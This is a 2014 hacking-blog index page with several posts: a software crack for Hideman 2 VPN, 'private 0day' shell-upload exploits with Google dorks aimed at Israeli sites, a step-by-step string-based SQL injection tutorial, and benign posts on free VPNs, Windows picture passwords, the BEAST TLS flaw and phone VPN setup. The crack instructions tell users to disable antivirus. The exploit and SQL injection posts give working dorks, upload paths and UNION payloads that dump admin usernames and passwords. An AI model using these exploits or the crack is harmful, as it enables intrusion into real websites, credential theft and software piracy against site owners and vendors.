Latest Posts
Showing posts with label Protection. Show all posts
Showing posts with label Protection. Show all posts

18 July 2014

HideMan2 Premium vpn Life Time

Hideman 2

Hideman application creates VPN connection to one of our servers located in 16 countries around the world. We try to add new servers as fast as we can.
VPN connection protects your privacy and increase security level.
This crack will remove the hour limit of Hideman 2,letting you to be connected to the VPN Server forever
  • How to Crack ?

    1. Install Hideman 2
    2. Exit from Hideman using system tray icon (important)
    3. Turn off any virus guards
    4. Run Hideman 2 Crack, and press crack button
    5. If asked browse and select ‘Hideman.exe’ file from Hideman installation path
    6. Done :)  
    How to fix Disconnected issue ?
    sometimes you will continuously get disconnected message in hideman after applying crack.follow the steps given below to fix it :)
  • Run Hideman
  • Press +1/1 button under Hours (nothing will happen other than loading,its OK)
  • Go to Payment Menu > Click 1 Month option (it will open a web page,just close it)
  • Now close Hideman completely using system tray icon
  • Go to Hideman installation path and delete ‘pref.cdat’ file (example path : C:\Program Files\Hideman\bin)
  • Now open Hideman and it will work normally :) [If this didnt work, re-apply the crack at step 5]

 Download:

HideMan2+cracke.rar 

Read more ...

13 July 2014

Israel Private 0Day Shell Upload Exploits ASP|PHP

Hey Guyz ..Today I found some FRESH Private Israel 0Day Exploits . So i thought of sharing with you all....So lets Start....
1). First 0Day Shell Upload ASP | PHP

# Google Dork -|-
'prod1.aspx?pid=' site:il or You can also create your own Dork
# Exploit Upload 1 -|-
/admin/adminbanners.aspx
# Exploit Upload 2 -|- 
/admin/AdminPics.aspx
When you upload your asp or php shell just Check Code Source of the page you will see your url


2). Second 0day Upload

# Dork -|- 
inurl:/index.php?categoryID= site:il
inurl:/index.php?ukey=auth
inurl:/index.php?ukey=feedback
inurl:/index.php?ukey=pricelist
inurl:/index.php?ukey=auxpage_faq
inurl:/shop/index.php?categoryID=
inurl:ukey=product&productID=
# Exploit -|-
/published/common/html/xinha/plugins/ImageManager/manager.php
#‎Exploit‬ -|-
/published/common/html/xinha/plugins/ExtendedFileManager/manager.php

3). Third 0day Upload Blind Sql Injection

 This just Targets with havij or manually and admin page of the script is www.target.co.il/QAdmin
# Dork -|- 

intext:cybercity site:il
inurl:index.php?id= <-- Page 4
intext:medicine site:il
inurl:index.php?id= <-- page 2
Read more ...

09 July 2014

String Based SQL injection

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)



Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Read more ...

Top 10 Free Vpn Services!!!



Top 10 Free VPN Servies
First of all, lets talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically it’s a private network which lets users to connect to other users or remote sites using a public network usually internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short , it is private network constructed within a public network infrastructure, such as the global Internet.
Why You Need VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet Surfing Full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites Unlike a proxy, you get secured connection for all programs you are using Quality Network ensures your VPN service will be fast wherever you are in the world Protection against your ISP Bypass ISP Blocking for VOIP Applications like Skype.

Top 10 Free VPN Servies
1. UltraVPN
(https://www.ultravpn.fr/) It is a free VPN client/ server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection making your connection safe and secure. You need to download and install the client and create a (username, password) to use this service.
2. Logmein Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It’s a great free VPN service from the well known guys who are behind the Logmein Service of remote apps management. It’s free for non-commercial and personal use. Features : No hardware required – A quick, simple and easy-to-use VPN that just works Secure communications – Encrypted tunneling across public and private networks Flexible networking – Combines the ease of an SSL VPN with the connectivity of an IP-sec VPN Web-based management – Deploy to anyone, manage from anywhere, access anytime Free for non-commercial usage – Absolutely free for non- commercial use.
3. Packetix
(http://www.packetix.net/en/)
Its a japanese free VPN solution with technology developed by SoftEther Corporation.You can use PacketiX.NET online test service for free.Here’s what you can do with this service. You can create your private Virtual VPN Hub. You can configure and use the hub for free.You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With our system, you won’t need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. Open VPN
( http://openvpn.net/index.php/opensource/downloads.html )
Open VPN drives UltraVPN, OpenVPN is a SSL/TLS based VPN, it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is you need install OpenVPN client software to use OpenVPN service, and OpenVPN DO NOT work on mobile devices such as Iphone, Ipad Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service but its performs almost the same function with great ease, hence i included this in this list. It provides both a free and paid service. Free service limits to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and a user name & password to use this.
6. Macro VPN
(http://www.macrovpn.com/)
Just like other services MacroVPN offer free VPN service for the user’s, it provides 128bit PPTP encrypted VPN Connection Service, protection on wifi hotspot. Normally assigned US based IP’s.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless) . Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS.Here also, you need to download and install a client to use it on your computer.
8. Its Hidden
(http://itshidden.com/)
Itshidden is part of Port 80 Limited(Seychelles) company providing both free VPN and paid services of VPN It creates a secure connection encrypting all the data protecting your privacy and securing you. You dont need to install any software. ItsHidden.com works on all Platforms including Windows, Mac, Linux, IPhone etc
9. CyberGhost
(http://cyberghostvpn.com/)
This a free VPN service from Germany which helps you route you through a German IP. The free service is limited to 10GB traffic every month, which is more than enough for surfing on websites, chatting and email.
10. Gpass
( http://gpass1.com/gpass/)
This is another free VPN service product of the World’s Gate, Inc which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.
Read more ...

08 July 2014

Secure Your PC by using Image as Login Password

In this post i am sharing a new way you can set password for your laptop or PC if you are using Windows 8. You can secure your Computer Easily by using Image as password for your Login. Yes, It is possible now,
In windows 8 you can Use image as your password. Using Text password is old and Boring way, Why not try something different. Their are many benefits of using Image as wallpaper, most important is that it is more secure than any text password. Read The full Post, I have mentioned Each step that you can follow to change or Use Any picture as Password. Using Image Gesture is very easy to use in windows 8




Steps To Create a Picture Password for Windows 8 :


Step 1: First Step is to creating a text password. Press Win key + I , Then click on Change PC settings. Than you will see an option of Create password below Sign-in Options. Just click on create password and Type any safe password for you.

Step 2: Now a new option for Create a picture password will be visible to you. Like in Below given Screenshot. Just Tap on it and choose a New Picture you want to set as password


2014-06-12_17h01_10

 Step 3: Now the Third Step is very important. You have to Make 3 Gestures on the picture you choose as password for your PC. Making Gesture is very Easy, but you have to keep that gesture in your mind as that gesture will allow you to login in your PC after setting picture as password. You can make a line, circle or box or anything. But Make it easy to remeber. You can check below screenshot. This arrow is my first gesture.

2014-06-12_17h05_12

Also Check :   Setting Up Port Forwarding In Router :D

Step 4: Now Click on next and Make another gesture. You have to make 3 gesture.  After Making Click Save.

Its done, Now you had set an picture as password for your window 8. If you like this article, comment below and Support me to bring such more interesting Article for you.

Below given screenshot is the 3 gestures i have used for my password. You can also create any gesture like me.

               2014-06-12_17h06_48
Read more ...

30 June 2014

SSL/TLS BEAST

SSL/TLS BEAST
Researchers have discovered a serious vulnerability in TLS v1.0 and SSL v3.0 that allows attackers to silently decrypt data that’s passing between a webserver and an end-user browser. This vulnerability can be exploited using a new cookie-based technique called “BEAST” (“Browser Exploit Against SSL/TLS”) that takes advantage of block-oriented cipher implementation such as AES and TripleDES.

Which file transfer protocols are affected?

Any interactive HTTPS-based web-based transfer application that relies on SSL/TLS will probably be affected.   Web-based “file send” applications will almost certainly be affected.  Web services that use cookies to maintain an authenticated session after sign on will also be affected.
At the moment it appears that only protocols that make use of browser cookies are affected.  That means that the FTPS and AS2 protocols are safe for now, even if they use TLS v1.0 or SSL v3.0.
SFTP and other protocols that use encryption not based on SSL/TLS are of course not affected by BEAST.

Which vendors are affected?

Just about ALL of them.  Any on-premise product or cloud-based product that:
  • allows end users to upload, download or send files through a web browser
  • AND uses an SSL/TLS-secured channel (i.e., uses HTTPS)
  • AND uses cookies (even memory-only cookies) to maintain user sessions after the initial sign on
 Recommendation

  • CHOICE #1:
    • DISABLE TLS v1.0 support on your file transfer web interfaces
    • DISABLE SSL v.3.0 support
    • ENABLE TLS v.1.1 and TLS v.1.2 support
  • CHOICE #2:
    • DISABLE AES and TripleDES encryption support on your file transfer web interfaces
      • (as per this article, both AES and TripleDES are affected)
    • ENABLE RC4 encryption support
  • IN ALL CASES:
    • Keep SSL v.2.0 disabled
      • (you should have already done this years ago)
    • If you are using a managed file transfer gateway or proxy to terminate SSL/TLS sessions, remember to check those configurations too
If you apply our “CHOICE #1″ recommended configuration you will likely encounter some compatibility problems with end users whose web browsers do not support TLS v1.1 or v1.2.  To get around this issue you will need to have your users upgrade their browsers to editions that support TLS v1.1 (see partial list below) or have your end users use a different web browser.  (The latest version of Opera and IE both support TLS v1.1.)
If you apply our “CHOICE #2″ recommended configuration you will not be able to use your FIPS-valided AES or TripleDES algorithms on your SSL/TLS connections.  Rc4 is an older, secure but not FIPS-validated algorithm that is often used by browsers and servers by default.  (R6, R4′s successor, was a runner-up to become the new AES algorithm during the open competition about a decade ago.)  
BEAST requires about two seconds to decrypt each byte of an encrypted cookie. That means authentication cookies of 1,000 to 2,000 characters long will still take a minimum of a half hour for their PayPal attack to work. Nonetheless, the technique poses a threat to millions of websites that use earlier versions of TLS, particularly in light of (the researchers’) claim that this time can be drastically shortened.
The decryption process is fast enough that it’s likely imperceptible users, and the researchers said that in a targeted attack, they likely could steal the cookie from a specific site within five minutes of loading the tool. Rizzo and Duong said that their attack exploits a vulnerability in the TLS 1.0 protocol that has been known for quite some time, but was thought to be unexploitable.”

What web browsers have been patched against this?

Opera is now patched!  (article)  It also supports TLS v1.1 – another fine choice!
IE is now patched! (article)
  • Google Chrome will soon have a BEAST patch ready (article)
  • Firefox has NOT yet promised a BEAST patch (article)CANNOT FIND any information about Safari/Webkit recognizing BEAST (please send me links!)
    • However, Oracle provided a Java plug-in patch for Firefox to make the most common exploit harder (article)

A relatively fresh list of browsers that support more recent versions of TLS v1.1 is maintained here:
http://en.wikipedia.org/wiki/Transport_Layer_Security#Browser_implementations
Currently only Opera (version 10 or higher) and IE (version 8 or higher on Windows 2008 R2 or Windows 7) are listed with TLS v1.1 support.  Firefox does not currently support TLS v1.1, nor does Chrome or Safari.   However pressure to add TLS v1.1 support to those browsers has increased substantially since BEAST was announced.

What are some of the servers that support TLS v.1.1?

Microsoft IIS 7 (on Windows 2008 R2) supports TLS v.1.1 but it must be specially enabled.  (This affects web transfer applications that rely on IIS such as Ipswitch’s WS_FTP Server Web Transfer Module, WS_FTP Server Ad Hoc Module and MOVEit DMZ.)
Many other file transfer vendors ship their own web servers with their products – check with your vendor for specific guidance.

this post is taken from http://www.filetransferconsulting.com
Read more ...

How To Use VPN in Windows Phone 8.1

Use a VPN connection

At a coffee shop and need to get to a site on your company's intranet? Or using an app from your company at home? With virtual private networking (VPN), you can do these things from your Windows Phone—just as if you were in the office. VPN gives you a secure connection to your company's network, so you can send and receive private information using a Wi-Fi or cellular data connection.

To get a VPN profile on your phone

The first step is to get a VPN profile onto your phone. There are two ways to get one:
  • Set up a workplace account to automatically get a VPN profile from your company.
  • Create a VPN profile on your own. (You can learn how later in this topic.) When you do this, you'll need to contact your company's support person to get the VPN connection settings for your organization.

Note

VPN is only available on Windows Phone 8.1. Check to see which software version you have and find out if an update is available.

To connect to a VPN

Once you have a VPN profile on your phone, you're ready to connect.
  1. In the App list, tap Settings Settings icon > VPN.

  2. Tap and hold the VPN profile name, and then tap Edit.
  3. In the User name and Password boxes, type your user name and password.
  4. To connect to the VPN, do one of the following, depending on what type of profile you're using:
    • If the VPN profile has Automatic listed under it, your phone will automatically connect to the VPN when you try to access information on your company's network.
    • If the VPN profile has Manual listed under it, tap the profile to connect to the VPN, and then use the app that accesses data on your company's network or visit a company intranet site.

Note

The icons at the top of your screen will show you when you're connected to the VPN. This icon VPN over Wi-Fi icon appears when you're connected over Wi-Fi, and this one VPN over cellular data icon shows when you're connected over cellular data.

To create a VPN profile

If you don't have a VPN profile on your phone, you'll need to create one on your own. Before you start, contact your company's support person to get the VPN connection settings for your organization.
  1. In the App list, tap Settings Settings icon > VPN.
  2. Set Status to On Toggle On icon, and then tap Add Add icon.
  3. In the Server name or IP address box, type the server name or IP address of your VPN server.
  4. Tap Type and choose the type of VPN connection you want to create.
    If an SSL VPN app is required and you don't have one installed yet, tap the link to download one from the Store.
  5. Tap Connect using, and choose the method you want to use to connect.
  6. In the User name and Password boxes, type your user name and password.
  7. To automatically connect to the VPN when a company app or site requires it, set Connect automatically to On Toggle On icon.
  8. For Send all traffic, do one of the following:
    • To have all data you send and receive go over the VPN, set Send all traffic to On Toggle On icon.
    • To only have data that requires access to your company's network or intranet go over the VPN connection, set Send all traffic to Off Toggle Off icon, tap Domains and IP ranges, and then enter the domain names and IP ranges that are protected. Only data that's sent and received from those domains or IP addresses will go over the VPN connection. Other data that's sent or received won't go over the VPN.
  9. In the Profile name box, type a name for your profile.
  10. Tap Advanced, and then enter any additional settings you need to for your organization's VPN.
    You might need to contact your company's support person to get additional information, such as the Proxy settings and DNS suffix to use for your company's network.
  11. Press the Back Back button icon button on your phone to go back to the Add profile screen, and then tap Save.
Read more ...
Designed By Published.. Blogger Templates